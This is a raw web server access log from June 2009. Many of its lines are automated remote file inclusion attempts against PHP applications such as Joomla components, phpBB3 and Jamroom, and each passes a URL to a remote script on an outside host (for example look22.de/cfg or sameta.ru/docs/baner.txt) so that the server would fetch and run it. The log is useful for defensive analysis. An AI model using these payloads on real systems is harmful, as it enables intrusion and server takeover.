80.93.53.109 - - [24/Jun/2009:06:16:14 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.8) Gecko/20050511"
83.98.209.71 - - [24/Jun/2009:06:16:29 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
66.249.71.57 - - [24/Jun/2009:06:16:30 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106D4712E35400CFD0018+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
121.169.189.169 - - [24/Jun/2009:06:16:35 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610C411BA36200E980066+M37+ENG HTTP/1.1" 200 57309 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610C491133B2007CF0066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
121.169.189.169 - - [24/Jun/2009:06:16:40 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610D47169362001D20066+M37+ENG HTTP/1.1" 200 58101 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610C411BA36200E980066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
121.169.189.169 - - [24/Jun/2009:06:16:43 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610D4C15E3420018A0066+M37+ENG HTTP/1.1" 200 48903 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610D47169362001D20066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
216.139.67.116 - - [24/Jun/2009:06:16:44 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:06:16:44 -0400] "GET /logs/access_log.Q109052800%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/_a?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
67.15.171.4 - - [24/Jun/2009:06:16:49 -0400] "GET /logs//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
67.15.171.4 - - [24/Jun/2009:06:16:49 -0400] "GET //components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
67.15.171.4 - - [24/Jun/2009:06:16:49 -0400] "GET /logs/access_log.Q109052200//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
216.139.67.116 - - [24/Jun/2009:06:16:50 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.lazar.ru/manager/actions/cfg?%0D? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1"
67.15.171.4 - - [24/Jun/2009:06:17:01 -0400] "GET /logs/access_log.Q109051100//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
80.93.53.109 - - [24/Jun/2009:06:17:03 -0400] "GET /logs/access_log.Q109052800/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 270 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20060321 Firefox/2.0a1"
208.111.94.201 - - [24/Jun/2009:06:17:44 -0400] "GET /logs/access_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
88.238.86.1 - - [24/Jun/2009:06:18:11 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; InfoPath.1)"
209.59.12.99 - - [24/Jun/2009:06:18:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
208.111.94.201 - - [24/Jun/2009:06:18:52 -0400] "GET /logs/error_log.Q109053100//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
121.169.189.169 - - [24/Jun/2009:06:18:53 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610D4F13D362001F80066+M37+ENG HTTP/1.1" 200 77315 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610D4C15E3420018A0066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
80.93.53.109 - - [24/Jun/2009:06:19:06 -0400] "GET /logs/access_log.Q109051300%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
121.169.189.169 - - [24/Jun/2009:06:19:05 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610D4A164302009260066+M37+ENG HTTP/1.1" 200 58099 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610D4F13D362001F80066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
83.98.209.71 - - [24/Jun/2009:06:19:13 -0400] "GET /logs/error_log.Q109051100/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
121.169.189.169 - - [24/Jun/2009:06:19:19 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610D4617734200ADD0066+M37+ENG HTTP/1.1" 200 58425 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610D4A164302009260066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
83.98.209.71 - - [24/Jun/2009:06:19:25 -0400] "GET /logs/error_log.Q109060200/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929"
83.98.209.71 - - [24/Jun/2009:06:19:30 -0400] "GET /logs/error_log.Q109051100/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
121.169.189.169 - - [24/Jun/2009:06:19:31 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610D4210937200BFF0066+M37+ENG HTTP/1.1" 200 58407 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610D4617734200ADD0066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
121.169.189.169 - - [24/Jun/2009:06:19:34 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610D4E1AE38200B2F0066+M37+ENG HTTP/1.1" 200 58103 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610D4210937200BFF0066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
121.169.189.169 - - [24/Jun/2009:06:19:38 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L01610D421C032200CC20066+M37+ENG HTTP/1.1" 200 49825 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L01610D4E1AE38200B2F0066+M37+ENG" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/2.0.172.33 Safari/530.5"
83.98.209.71 - - [24/Jun/2009:06:19:40 -0400] "GET /logs/error_log.Q109060200/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://www.look22.de/cfg?? HTTP/1.1" 404 269 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
74.52.187.58 - - [24/Jun/2009:06:19:41 -0400] "GET /index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt? HTTP/1.1" 404 207 "-" "libwww-perl/5.811"
80.93.53.109 - - [24/Jun/2009:06:20:12 -0400] "GET /logs/access_log.Q109052800%20%20/administrator/components/com_mgm/help.mgm.php?mosConfig_absolute_path=http://arsenal-music.ru/modules/mod_virtuemart_search/_a?? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
67.15.171.4 - - [24/Jun/2009:06:20:30 -0400] "GET /logs/access_log.Q109052200%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
67.15.171.4 - - [24/Jun/2009:06:20:30 -0400] "GET /logs/access_log.Q109051100%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://163.30.144.27/phpMyAdmin/LICENSE?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
193.243.139.4 - - [24/Jun/2009:06:21:23 -0400] "GET /logs/access_log.Q109061800//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:21:23 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:21:24 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:21:29 -0400] "GET /logs/access_log.Q109061800//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 273 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:21:29 -0400] "GET //components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 246 "-" "libwww-perl/5.803"
193.243.139.4 - - [24/Jun/2009:06:21:30 -0400] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://sunset-travel.ro/en/cache/ids.txt?? HTTP/1.1" 404 251 "-" "libwww-perl/5.803"
66.249.71.57 - - [24/Jun/2009:06:21:58 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01106B461F93D4001DC0025+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.140.142.39 - - [24/Jun/2009:06:22:24 -0400] "GET /logs/error_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://rox-crime.no-ip.org:8080/mic22.txt??? HTTP/1.1" 404 253 "-" "libwww-perl/5.65"
125.140.142.39 - - [24/Jun/2009:06:22:24 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://rox-crime.no-ip.org:8080/mic22.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.65"
125.140.142.39 - - [24/Jun/2009:06:22:26 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://rox-crime.no-ip.org:8080/mic22.txt??? HTTP/1.1" 404 232 "-" "libwww-perl/5.65"
208.111.94.201 - - [24/Jun/2009:06:23:02 -0400] "GET //authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:23:03 -0400] "GET /logs//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:23:03 -0400] "GET /logs/access_log.Q109060300%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:06:23:33 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
217.147.29.190 - - [24/Jun/2009:06:25:12 -0400] "GET /?REX[INCLUDE_PATH]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 409 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:06:25:16 -0400] "GET /logs/?REX[INCLUDE_PATH]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 200 6778 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:06:25:16 -0400] "GET /logs/access_log.Q109052600/?REX[INCLUDE_PATH]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:06:25:19 -0400] "GET /logs/access_log.Q109053100/?REX[INCLUDE_PATH]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.6.17.151 - - [24/Jun/2009:06:25:23 -0400] "GET /logs/access_log.Q108043000 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
209.172.33.230 - - [24/Jun/2009:06:25:27 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:06:25:27 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:06:25:27 -0400] "GET /logs/access_log.Q109051600//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:06:25:53 -0400] "GET /logs/access_log.Q109061200//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.121.137.51 - - [24/Jun/2009:06:27:17 -0400] "GET //include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
91.121.137.51 - - [24/Jun/2009:06:27:17 -0400] "GET /logs//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
91.121.137.51 - - [24/Jun/2009:06:27:17 -0400] "GET /logs/access_log.Q109051600//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
91.121.137.51 - - [24/Jun/2009:06:27:26 -0400] "GET /logs/access_log.Q109061200//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:06:28:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.71.57 - - [24/Jun/2009:06:28:51 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L01105E4315C364001C90011+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.111.94.201 - - [24/Jun/2009:06:29:09 -0400] "GET /logs/error_log.Q109060300%20%20//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
209.172.33.230 - - [24/Jun/2009:06:29:20 -0400] "GET /logs/access_log.Q109051600%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
85.159.144.20 - - [24/Jun/2009:06:29:23 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/html.png?%0D?? HTTP/1.1" 404 251 "-" "libwww-perl/5.805"
85.159.144.20 - - [24/Jun/2009:06:29:23 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/html.png?%0D?? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
85.159.144.20 - - [24/Jun/2009:06:29:23 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/html.png?%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
85.159.144.20 - - [24/Jun/2009:06:29:30 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/html.png?%0D?? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
209.172.33.230 - - [24/Jun/2009:06:29:39 -0400] "GET /logs/access_log.Q109061200%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.abi07-pgg.de/abi07/cache/baner.txt?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.52.187.58 - - [24/Jun/2009:06:29:56 -0400] "GET /logs/access_log.Q109061200/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
74.52.187.58 - - [24/Jun/2009:06:29:56 -0400] "GET /logs/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt? HTTP/1.1" 404 212 "-" "libwww-perl/5.811"
91.121.137.51 - - [24/Jun/2009:06:30:28 -0400] "GET /logs/access_log.Q109051600%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
91.121.137.51 - - [24/Jun/2009:06:30:56 -0400] "GET /logs/access_log.Q109061200%20%20//include/plugins/jrBrowser/purchase.php?jamroom[jm_dir]=http://www.inboxstorage.nl/images/tick.gif?? HTTP/1.1" 404 266 "-" "Mozilla/5.0"
74.52.187.58 - - [24/Jun/2009:06:31:31 -0400] "GET /logs/access_log.Q109060700/index.php?option=com_agora&task=http://www.daftarwarisan.gov.my/img/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.811"
123.143.98.5 - - [24/Jun/2009:06:31:43 -0400] "GET /components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
123.143.98.5 - - [24/Jun/2009:06:31:43 -0400] "GET /logs/access_log.Q109061800%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
123.143.98.5 - - [24/Jun/2009:06:31:43 -0400] "GET /logs/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
123.143.98.5 - - [24/Jun/2009:06:31:52 -0400] "GET /logs/access_log.Q109061500%20%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
85.159.144.20 - - [24/Jun/2009:06:32:27 -0400] "GET /logs/access_log.Q109061800%20/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/html.png?%0D?? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
89.38.128.43 - - [24/Jun/2009:06:32:48 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:32:48 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:32:48 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:32:54 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:32:59 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:32:59 -0400] "GET /logs/access_log.Q109060800%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:32:59 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:33:03 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:06:33:13 -0400] "GET /logs/access_log.Q109053100%20%20/?REX[INCLUDE_PATH]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:06:33:16 -0400] "GET /logs/access_log.Q109052600%20%20/?REX[INCLUDE_PATH]=http://www.c21vox.tv/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:06:33:27 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:06:33:27 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:06:33:28 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:06:33:28 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:06:33:29 -0400] "GET //PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 232 "-" "Mozilla/5.0"
211.189.18.73 - - [24/Jun/2009:06:33:29 -0400] "GET /logs//PhpLinkExchange/bits_listings.php?svr_rootPhpStart=http://www.hockeyknowitall.com//tmp/id1.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
209.59.12.99 - - [24/Jun/2009:06:33:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
69.94.125.100 - - [24/Jun/2009:06:34:03 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
69.94.125.100 - - [24/Jun/2009:06:34:07 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
123.143.98.5 - - [24/Jun/2009:06:34:15 -0400] "GET /logs/access_log.Q109061800/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
123.143.98.5 - - [24/Jun/2009:06:34:20 -0400] "GET /logs/access_log.Q109061500/components/com_moofaq/includes/file_includer.php?gzip=0&file=http://zoulekreunion.com/images/back.png?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:34:35 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.38.128.43 - - [24/Jun/2009:06:34:39 -0400] "GET /logs/access_log.Q109053100//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
208.111.94.201 - - [24/Jun/2009:06:34:46 -0400] "GET /logs/access_log.Q109060300//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
66.249.71.57 - - [24/Jun/2009:06:35:06 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011061451723E400A5D0013+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
208.111.94.201 - - [24/Jun/2009:06:35:14 -0400] "GET /logs/error_log.Q109060300//authentication/phpbb3/phpbb3.functions.php?pConfig_auth[phpbb_path]=http://www.sameta.ru/docs/baner.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
38.99.44.103 - - [24/Jun/2009:06:36:23 -0400] "GET /logs/access_log.Q107062400 HTTP/1.0" 404 224 "-" "Mozilla/5.0 (Twiceler-0.9 http://www.cuil.com/twiceler/robot.html)"
217.147.29.190 - - [24/Jun/2009:06:36:42 -0400] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:06:36:42 -0400] "GET /logs/access_log.Q109060800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:06:36:46 -0400] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
217.147.29.190 - - [24/Jun/2009:06:37:12 -0400] "GET /logs/access_log.Q109053100%20%20//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://www.fairmontbr.com.br//id1.txt? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
